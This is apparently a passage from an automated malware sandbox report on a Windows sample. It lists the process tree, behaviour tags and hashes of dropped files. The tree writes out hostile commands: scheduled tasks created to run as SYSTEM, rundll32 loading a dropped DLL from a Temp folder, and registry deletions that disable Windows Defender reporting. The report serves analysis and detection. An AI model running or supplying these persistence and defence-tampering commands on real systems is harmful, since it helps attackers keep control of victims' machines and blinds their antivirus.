C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ErhcMqZyPKQzNnH2" /F /xml "C:\Program Files (x86)\CXdyuXxQU\eSXxMgy.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1964
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ErhcMqZyPKQzNnH"3⤵PID:1408
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ErhcMqZyPKQzNnH"3⤵PID:1484
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "TzHNCgqXVcbCsT" /F /xml "C:\Program Files (x86)\YnFPtusxCOTU2\UQZKBEg.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1700
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "UfarzoSChLufz2" /F /xml "C:\ProgramData\RIEoyfpemMjlUPVB\fgSwPKL.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:832
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "iQozJLGfyohvxjpyN2" /F /xml "C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR\dEuuLNk.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:324
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ASXvXFEBgQcQQTYguNW2" /F /xml "C:\Program Files (x86)\LCSurMlfClMRC\JmvvNec.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1656
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NSdDFfEujjmGqHjBl" /SC once /ST 04:50:27 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\MNBTbrbBidagOXts\csKKxjxL\yLHLezF.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1120
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "NSdDFfEujjmGqHjBl"3⤵PID:1872
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:1580
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:1516
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:1936
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:856
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "GrrjjXtPjBVPFNmZQ"3⤵PID:1732
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\MNBTbrbBidagOXts\csKKxjxL\yLHLezF.dll",#1 /site_id 5254032⤵PID:1488
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\MNBTbrbBidagOXts\csKKxjxL\yLHLezF.dll",#1 /site_id 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1772 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "NSdDFfEujjmGqHjBl"4⤵PID:1408
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1180
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1968
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "3809329601571770322-190895071416404744971566857099-39151518624312858678408353"1⤵
- Windows security bypass
PID:684
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1408
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5e9292adef499b47ed805d7748cea5b06
SHA1c389bd6ef7de1085e143da52ef09eca3d5730add
SHA25683aa02f0f1031bd400787a478535f835339b748af7f873cb71676ec7582bc70a
SHA512e5871dbe815b9c202dadf421ffdbfcd8fe016dec3d1e98c8849bdaf3fc8baf2f8437053c3be97b0ab936f15b68a007cfbfab554b5b5f8c9ea6ecad04d4dbb362
-
Filesize
2KB
MD510541ca37159c2b47dafced6360c8628
SHA1998eab7e76b6f69119a29c21897c2014aee781e6
SHA25651f448e4a929c682d416a5298acc2bdc70eb828c2a62d5b7b74ca860b95e3100
SHA512cae9f88f8e33ab4cd612bad4fc235ffbce27ec2037fb0d749effa49fd53bfe6d35810dbd74b3f33208a6e8e07e3b4a09a3ef68559e734241e6e4de51aab5fffb
-
Filesize
2KB
MD5a498318e71687f80cbe314387aa840f8
SHA1eb3ca2c09fb0ed0e42d399e8d8e02555d403d593
SHA256f551a714ecb67ee44afb83fa952a667c67401dbe38c73dc5cc393f520752b07b
SHA5123ab56dedaf67847fef26b43aec01f47958f00dc68d8dd41e6fd0b1830d712622bcc82200ff7513067b9cee23300c3321f6377cebe432a27562dff89a8395bde5
-
Filesize
2KB
MD5d794319e958c41cfd0dab98e5eccfd37
SHA184a67889f24b3269e8bfcb56bcd47c7c26ba5f64
SHA2564a5dd3bea1a87b73dc2da585b2fdfe0c042197813b6effb7f640d33bd07d38b8
SHA51203319d4cba07514dce483bd61acd1ca9c597d5ab0a7ad73ef2b04a3ad44b3c6322a645f98051382e33958eeebb4aec287d0d8f3775eeabbecf896088d100c9ee
-
Filesize
2KB
MD5645266ec8a15a09b0aa0e64f1dbeaa48
SHA17c9301ec73688f8182a9c5e2f5a72240212de137
SHA2568722deed00ba608386476824f65649cabc5d0f9426f8a6ebddf7aafd95013387
SHA512b816a3c8060c797a9cc61693848cc765694aeb4a83890b19a19e245353b14f211779412ab9ac664400e578f9cc9945d5bd53adb3e64f85bee4e1dc04f7b3edac
-
Filesize
6.4MB
MD5c32ef4b3af7e081e9e15878faaf3f5e0
SHA140ea6dad6551955ff9b9334104c1ef6ebfd7626b
SHA256a54e556284c1c236ee8d7c9d2dc80e59fc8c5dfbb31c4b67f2773b96ba356ba6
SHA51202755c3bf96686192292566ff24e6e985966a2701dd9d9f50520916bf6ff5291c94f8d79ad3b325e05e12cf963e5c34cc05ffb163235e55195a9758f5b2542f4
-
Filesize
6.4MB
MD5c32ef4b3af7e081e9e15878faaf3f5e0
SHA140ea6dad6551955ff9b9334104c1ef6ebfd7626b
SHA256a54e556284c1c236ee8d7c9d2dc80e59fc8c5dfbb31c4b67f2773b96ba356ba6
SHA51202755c3bf96686192292566ff24e6e985966a2701dd9d9f50520916bf6ff5291c94f8d79ad3b325e05e12cf963e5c34cc05ffb163235e55195a9758f5b2542f4
-
Filesize
7.0MB
MD5f97416d14073c98a7bc58eaac2321c0f
SHA1785c538f256d59bf6a986d04f9e1b2ffc9665ad7
SHA256bd075ce52944339fff704eaed225809f04b1319674bbe4cda9480cc11896c1b1
SHA512a7aae4a9994d285182ca61f786b594d8ac4226c526d64da0c75430b34513ad1fcc9d93096a25e6144e343429a5ef28cb3a9768ea0bf9df5ecbe2aca4e2ff6066
-
Filesize
7.0MB
MD5f97416d14073c98a7bc58eaac2321c0f
SHA1785c538f256d59bf6a986d04f9e1b2ffc9665ad7
SHA256bd075ce52944339fff704eaed225809f04b1319674bbe4cda9480cc11896c1b1
SHA512a7aae4a9994d285182ca61f786b594d8ac4226c526d64da0c75430b34513ad1fcc9d93096a25e6144e343429a5ef28cb3a9768ea0bf9df5ecbe2aca4e2ff6066
-
Filesize
7.0MB
MD5f97416d14073c98a7bc58eaac2321c0f
SHA1785c538f256d59bf6a986d04f9e1b2ffc9665ad7
SHA256bd075ce52944339fff704eaed225809f04b1319674bbe4cda9480cc11896c1b1
SHA512a7aae4a9994d285182ca61f786b594d8ac4226c526d64da0c75430b34513ad1fcc9d93096a25e6144e343429a5ef28cb3a9768ea0bf9df5ecbe2aca4e2ff6066
-
Filesize
7.0MB
MD5f97416d14073c98a7bc58eaac2321c0f
SHA1785c538f256d59bf6a986d04f9e1b2ffc9665ad7
SHA256bd075ce52944339fff704eaed225809f04b1319674bbe4cda9480cc11896c1b1
SHA512a7aae4a9994d285182ca61f786b594d8ac4226c526d64da0c75430b34513ad1fcc9d93096a25e6144e343429a5ef28cb3a9768ea0bf9df5ecbe2aca4e2ff6066
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD597957a83b8c69afa9552eab81dfeda99
SHA1c24cc5f2c29d69e7b5b08a423b4d16c40ac7aeab
SHA2561428cd900081df0ba30c1be059578de43ec59e643619938828b95d638047f092
SHA512c20f544734b670e67f8568610d7f7a2521e0dc89fb4b670e278cb7721fc190f29a30755661919bb4f4919922c7a7d0a1a8a17762af68845b7f842b24856c64fb
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD509643fc0aef97bd4d91fca6b578e227e
SHA18d22f91947a99b87868578b6a5048b345c77d1c4
SHA256292ea8f54d145c5d623281c845bb317b8a3e4f9bcb3f1c78e8da73668545531e
SHA512c4469ebf345cd769e0fa32ba4ac1222e69203a7b6b444a48750f976f94473bb836f980e23a2fe4793242ce6afdb6c29df8083b1458416de47596b39e709b1d6f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5b4692d2cc422e69fcf9f8bd59b4e4364
SHA14e8d54f9f30d0c694a2db4a6d1acea85a7f872cd
SHA256e28cea12e289987e15848009ed437481468a05a17942ed6da060e47b77159269
SHA512156c12409aa19b77e7b1451f9756eff18950328f8cb6c42f032789ee3ed5c79df41393eb78d6f78e339a9d6e335c430f107b3f72f564fb7d6c1e3f4ef3836e97
-
Filesize
8KB
MD5e1ba172ac6e9f1d49e4bb3665909dfff
SHA1715b7b5582ced31fd9dd46d9b1289f525f561762
SHA25646021d253d84c6a73349d03dd01a8b3e4bd12d68dc2f4bc4a604524d5742c1f7
SHA5125cc7cc8981489991765b4c88ba5bee71a4a381943e3717ca33bbce28aa3b243c33df0c76df48d1725ed2b26243c6a8cebc438652cc7cd699bb79c28cc6e4829d
-
Filesize
6.2MB
MD512dc3865ebd30712526e9c0d9d503212
SHA12a5e8f3c4b4cf288c6dcbd46c3211415e68064e7
SHA256bac25acf25dcc8c5f404e61d0abb9b808555dbf136a2b010a4c457a3245f92ee
SHA512c76bd014affefb7a2f3fbe89ff5175b90078238de55844caecfae210ee1847ad3481913f94361d4d425a882a3b81636f252e8f682a3d14895073922eb89275bf
-
Filesize
7.0MB
MD5f97416d14073c98a7bc58eaac2321c0f
SHA1785c538f256d59bf6a986d04f9e1b2ffc9665ad7
SHA256bd075ce52944339fff704eaed225809f04b1319674bbe4cda9480cc11896c1b1
SHA512a7aae4a9994d285182ca61f786b594d8ac4226c526d64da0c75430b34513ad1fcc9d93096a25e6144e343429a5ef28cb3a9768ea0bf9df5ecbe2aca4e2ff6066
-
Filesize
7.0MB
MD5f97416d14073c98a7bc58eaac2321c0f
SHA1785c538f256d59bf6a986d04f9e1b2ffc9665ad7
SHA256bd075ce52944339fff704eaed225809f04b1319674bbe4cda9480cc11896c1b1
SHA512a7aae4a9994d285182ca61f786b594d8ac4226c526d64da0c75430b34513ad1fcc9d93096a25e6144e343429a5ef28cb3a9768ea0bf9df5ecbe2aca4e2ff6066
-
Filesize
4KB
MD5a6f315a184f2b1353e6c434790333bce
SHA114af82999ca588e61aeed6279391a509552aa1d3
SHA256a6ac59399c65bfdfee8c791f07c64f67c3253ae9e6c9cb0e939a4b30add9dad8
SHA5124c55c095b21a96cc58dae0ffae03c41f9778f0a438731c04c8f3ff1adc5a14f34a0fd4dc0be02131f2294c8f9de5c5bf698b2ae88854f9062ef51ea36f554f86
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
Filesize
6.4MB
MD5c32ef4b3af7e081e9e15878faaf3f5e0
SHA140ea6dad6551955ff9b9334104c1ef6ebfd7626b
SHA256a54e556284c1c236ee8d7c9d2dc80e59fc8c5dfbb31c4b67f2773b96ba356ba6
SHA51202755c3bf96686192292566ff24e6e985966a2701dd9d9f50520916bf6ff5291c94f8d79ad3b325e05e12cf963e5c34cc05ffb163235e55195a9758f5b2542f4
-
Filesize
6.4MB
MD5c32ef4b3af7e081e9e15878faaf3f5e0
SHA140ea6dad6551955ff9b9334104c1ef6ebfd7626b
SHA256a54e556284c1c236ee8d7c9d2dc80e59fc8c5dfbb31c4b67f2773b96ba356ba6
SHA51202755c3bf96686192292566ff24e6e985966a2701dd9d9f50520916bf6ff5291c94f8d79ad3b325e05e12cf963e5c34cc05ffb163235e55195a9758f5b2542f4
-
Filesize
6.4MB
MD5c32ef4b3af7e081e9e15878faaf3f5e0
SHA140ea6dad6551955ff9b9334104c1ef6ebfd7626b
SHA256a54e556284c1c236ee8d7c9d2dc80e59fc8c5dfbb31c4b67f2773b96ba356ba6
SHA51202755c3bf96686192292566ff24e6e985966a2701dd9d9f50520916bf6ff5291c94f8d79ad3b325e05e12cf963e5c34cc05ffb163235e55195a9758f5b2542f4
-
Filesize
6.4MB
MD5c32ef4b3af7e081e9e15878faaf3f5e0
SHA140ea6dad6551955ff9b9334104c1ef6ebfd7626b
SHA256a54e556284c1c236ee8d7c9d2dc80e59fc8c5dfbb31c4b67f2773b96ba356ba6
SHA51202755c3bf96686192292566ff24e6e985966a2701dd9d9f50520916bf6ff5291c94f8d79ad3b325e05e12cf963e5c34cc05ffb163235e55195a9758f5b2542f4
-
Filesize
7.0MB
MD5f97416d14073c98a7bc58eaac2321c0f
SHA1785c538f256d59bf6a986d04f9e1b2ffc9665ad7
SHA256bd075ce52944339fff704eaed225809f04b1319674bbe4cda9480cc11896c1b1
SHA512a7aae4a9994d285182ca61f786b594d8ac4226c526d64da0c75430b34513ad1fcc9d93096a25e6144e343429a5ef28cb3a9768ea0bf9df5ecbe2aca4e2ff6066
-
Filesize
7.0MB
MD5f97416d14073c98a7bc58eaac2321c0f
SHA1785c538f256d59bf6a986d04f9e1b2ffc9665ad7
SHA256bd075ce52944339fff704eaed225809f04b1319674bbe4cda9480cc11896c1b1
SHA512a7aae4a9994d285182ca61f786b594d8ac4226c526d64da0c75430b34513ad1fcc9d93096a25e6144e343429a5ef28cb3a9768ea0bf9df5ecbe2aca4e2ff6066
-
Filesize
7.0MB
MD5f97416d14073c98a7bc58eaac2321c0f
SHA1785c538f256d59bf6a986d04f9e1b2ffc9665ad7
SHA256bd075ce52944339fff704eaed225809f04b1319674bbe4cda9480cc11896c1b1
SHA512a7aae4a9994d285182ca61f786b594d8ac4226c526d64da0c75430b34513ad1fcc9d93096a25e6144e343429a5ef28cb3a9768ea0bf9df5ecbe2aca4e2ff6066
-
Filesize
7.0MB
MD5f97416d14073c98a7bc58eaac2321c0f
SHA1785c538f256d59bf6a986d04f9e1b2ffc9665ad7
SHA256bd075ce52944339fff704eaed225809f04b1319674bbe4cda9480cc11896c1b1
SHA512a7aae4a9994d285182ca61f786b594d8ac4226c526d64da0c75430b34513ad1fcc9d93096a25e6144e343429a5ef28cb3a9768ea0bf9df5ecbe2aca4e2ff6066
-
Filesize
6.2MB
MD512dc3865ebd30712526e9c0d9d503212
SHA12a5e8f3c4b4cf288c6dcbd46c3211415e68064e7
SHA256bac25acf25dcc8c5f404e61d0abb9b808555dbf136a2b010a4c457a3245f92ee
SHA512c76bd014affefb7a2f3fbe89ff5175b90078238de55844caecfae210ee1847ad3481913f94361d4d425a882a3b81636f252e8f682a3d14895073922eb89275bf
-
Filesize
6.2MB
MD512dc3865ebd30712526e9c0d9d503212
SHA12a5e8f3c4b4cf288c6dcbd46c3211415e68064e7
SHA256bac25acf25dcc8c5f404e61d0abb9b808555dbf136a2b010a4c457a3245f92ee
SHA512c76bd014affefb7a2f3fbe89ff5175b90078238de55844caecfae210ee1847ad3481913f94361d4d425a882a3b81636f252e8f682a3d14895073922eb89275bf
-
Filesize
6.2MB
MD512dc3865ebd30712526e9c0d9d503212
SHA12a5e8f3c4b4cf288c6dcbd46c3211415e68064e7
SHA256bac25acf25dcc8c5f404e61d0abb9b808555dbf136a2b010a4c457a3245f92ee
SHA512c76bd014affefb7a2f3fbe89ff5175b90078238de55844caecfae210ee1847ad3481913f94361d4d425a882a3b81636f252e8f682a3d14895073922eb89275bf
-
Filesize
6.2MB
MD512dc3865ebd30712526e9c0d9d503212
SHA12a5e8f3c4b4cf288c6dcbd46c3211415e68064e7
SHA256bac25acf25dcc8c5f404e61d0abb9b808555dbf136a2b010a4c457a3245f92ee
SHA512c76bd014affefb7a2f3fbe89ff5175b90078238de55844caecfae210ee1847ad3481913f94361d4d425a882a3b81636f252e8f682a3d14895073922eb89275bf